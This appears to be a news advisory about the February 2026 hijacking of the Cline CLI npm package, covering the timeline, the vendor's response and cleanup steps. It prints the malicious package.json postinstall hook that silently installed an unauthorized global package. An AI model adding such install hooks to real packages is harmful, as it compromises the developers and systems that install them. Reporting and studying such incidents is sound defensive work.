Cline CLI npm Package Hijacked for 8 Hours
3 min. read 
Published on
Hackers compromised Cline CLI’s npm publish token on February 17, 2026, from 3:26 AM PT to 11:30 AM PT. They released malicious version 2.3.0 that installed OpenCLAW via postinstall script. Developers who installed during this window face potential supply chain risk.
Cline serves as AI coding assistant for VS Code and JetBrains. Attackers modified only package.json while leaving core files untouched. This preserved package functionality while injecting unauthorized dependency.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Cline team detected compromise, released clean 2.4.0, and deprecated 2.3.0. They revoked the stolen token and switched to OIDC provenance via GitHub Actions.
Attack Timeline
3:26 AM PT: Malicious [email protected] published
11:23 AM PT: Clean [email protected] released (8 hours later)
11:30 AM PT: 2.3.0 deprecated from npm registry
Compromised behavior:npm install -g [email protected]
Silently runs: npm install -g openclaw@latest
OpenCLAW appears legitimate but represents unauthorized supply chain insertion.
Technical Details
Attackers targeted publish token specifically. No code execution beyond npm install. VS Code extension and JetBrains plugin unaffected.
Malicious package.json snippet:{
“scripts”: {
“postinstall”: “npm install -g openclaw@latest”
}
}
Core CLI binary (dist/cli.mjs) remained identical to 2.2.3.
Immediate Actions Required
For affected developers:
#Update immediately
npm install -g cline@latest
cline –version # Verify 2.4.0+
#Remove injected package
npm uninstall -g openclaw
#Verify no persistence
npm list -g –depth=0 | grep openclaw
Verify installation window: Check npm install logs for February 17, 3:26-11:30 AM PT.
Supply Chain Risk Assessment
| Risk Vector | Status | Mitigation |
|---|---|---|
| Code execution | None | Postinstall only installs package |
| Persistence | OpenCLAW npm package | Manual uninstall |
| Lateral movement | None detected | Dependency chain clean |
| Registry impact | Deprecated | npm prevents reinstall |
OpenCLAW legitimacy unverified. Treat as potentially malicious until audited.
Prevention Measures Implemented
Cline response:
- Stolen npm token revoked
- Publishing migrated to OIDC + GitHub Actions
- 2FA enforced on all accounts
- Release pipeline audit completed
Broader implications:
- npm publish tokens represent single point of failure
- OIDC eliminates static token risks
- Dependency verification becomes critical
Developer Ecosystem Impact
Immediate exposure: Developers installing [email protected] during 8-hour window
Potential vectors: Corporate npm mirrors, CI/CD pipelines
Verification needed: All environments using Cline CLI
npm Best Practices Post-Incident
Multi-factor: Enforce 2FA on all package accounts
Token hygiene: Rotate publish tokens quarterly
OIDC adoption: Eliminate static credentials
Release verification: Check package.json before install
Audit tools: Dependabot, Socket, npm audit
FAQ
February 17, 2026, 3:26 AM PT to 11:30 AM PT (8 hours).
Postinstall script installed openclaw@latest package.
No. Only npm CLI package compromised.
cline --version shows 2.4.0+. npm uninstall -g openclaw.
Token revoked. Publishing now uses OIDC via GitHub Actions.
Unknown legitimacy. Remove immediately regardless.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages